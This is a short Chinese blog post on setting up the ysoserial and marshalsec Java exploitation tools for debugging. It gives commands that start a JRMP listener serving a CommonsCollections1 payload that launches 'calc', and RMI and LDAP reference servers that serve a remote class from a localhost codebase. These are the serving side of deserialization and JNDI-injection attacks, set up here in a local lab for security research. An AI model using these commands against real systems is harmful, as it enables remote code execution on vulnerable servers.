ysoserial&marshalsec调试

ysoserial安装使用调试

安装

下载链接:https://github.com/frohoff/ysoserial

下载后需要自己编译生成jar包,这里把测试关掉后package打包就行了

需要java1.7以上

也可以直接下载jar:https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

使用

运行主类函数,如JRMPListener

1
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPListener 38471

运行exploit类。开启交互式服务,这里利用exploit.JRMPListener开启1099端口,并用CC1弹计算器。命令行的-cp参数表示指定classpath

1
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'calc'

查看ysoserial的payload:

1
java -jar ysoserial.jar

marshalsec

可以直接下jar版,也可https://gitee.com/mirrors/marshalsec下载后自行编译

开启RMI服务:

1
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

利用jndi.RMIReferServer开启RMI服务,绑定的远程对象在http://127.0.0.1/css/#ExportObject,端口1099

开启LDAP服务:

1
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

暂时只需要那么多

JNDI ysoserial marshalsec
上一篇:
Weblogic T3 反序列化
下一篇:
第九届中科大hackgame2022 web WP及新思路

    • Copyright © 2020 - 2023 godownio | Powered by Hexo | Theme Bamboo